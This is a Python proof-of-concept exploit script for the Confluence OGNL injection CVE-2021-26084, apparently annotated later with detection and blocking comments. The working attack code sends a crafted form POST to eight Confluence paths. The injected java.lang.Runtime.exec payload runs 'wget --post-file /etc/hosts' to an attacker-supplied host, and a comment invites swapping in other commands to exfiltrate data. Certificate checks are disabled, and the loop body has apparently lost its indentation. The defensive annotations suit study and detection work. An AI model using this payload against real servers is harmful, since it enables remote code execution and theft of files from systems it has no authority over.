CVE-2021-26084.py
import requests
import sys
import logging
from requests.packages import urllib3
# Flat proof-of-concept script for CVE-2021-26084 (per the file name): it sends
# one crafted form POST to each of eight Confluence paths and never reads the
# responses. The comments added below describe what each step puts on the wire
# so the traffic can be recognised in logs and blocked.

# Root logger at DEBUG, so requests/urllib3 emit their debug messages for every
# call (the author's "#log the requests" note below).
logging.basicConfig(level=logging.DEBUG)
# Silences the warning urllib3 raises for unverified HTTPS. Together with
# verify=False on the POST at the bottom, server certificates are never checked.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# NOTE(review): disable_warnings is imported here but not used in this listing.
from urllib3 import disable_warnings
#DorkerDevil
#no def. not dropping any shell.
#log the requests
# Paths that receive the POST. Defender view: search Confluence and
# reverse-proxy access logs for POSTs to these paths, especially several of them
# from one client in a short window and without a session cookie (target_headers
# below sets no Cookie or Authorization header).
list_endpoint = [ #hit multiple endpoints
"/pages/createpage-entervariables.action?SpaceKey=x",
"/pages/doenterpagevariables.action",
"/pages/createpage.action?spaceKey=myproj",
"/users/user-dark-features",
"/pages/templates2/viewpagetemplate.action",
"/template/custom/content-editor",
"/templates/editor-preload-container",
"/pages/createpage-entervariables.action"]
# argv[1] is concatenated onto the command string below; argv[2] is the base URL
# each path is appended to. Neither is validated, and a missing argument raises
# IndexError before any request is sent.
collab = sys.argv[1]
src_url = sys.argv[2]
#change the command as per ur need , cuz its harmless but still u can exfil. some nasty stuff out of the system
# The command asks the target host to POST a local file to an external address.
# Host-side signals: the Confluence JVM spawning wget (or any child process),
# and outbound HTTP from the Confluence server to a destination it does not
# normally contact. Egress filtering on that server limits this kind of callback.
dirty_command = 'wget --post-file /etc/hosts'+collab
# NOTE(review): the four statements below use the loop variable `l`, so they
# presumably form the body of this loop; the indentation appears to have been
# lost in this listing.
for l in list_endpoint:
target_url = src_url + l
# Fixed browser-like headers with a hard-coded Chrome 92 User-Agent and a
# form-encoded Content-Type. The User-Agent is a weak indicator on its own.
target_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
# Form body. `queryString` carries the literal text \u0027 (the source escapes
# the backslash) and `linkCreation` carries an OGNL expression that names
# java.lang.Runtime. Detection and WAF rules can key on a \u0027 escape inside
# a `queryString` form field and on `java.lang.Runtime` / `getRuntime` in any
# POST body sent to Confluence. The durable fix is upgrading to a Confluence
# release patched for CVE-2021-26084 (see the vendor advisory).
target_data = {"queryString": "dropdead\\u0027,(linkCreation)(0xd0ff90),\\u0027dropdead", "linkCreation" : "@java.lang.Runtime@getRuntime().exec('"+dirty_command+"')"}
# Response is discarded and no timeout is set; the script itself never learns
# whether the request had any effect.
requests.post(target_url, headers=target_headers, data=target_data, verify=False)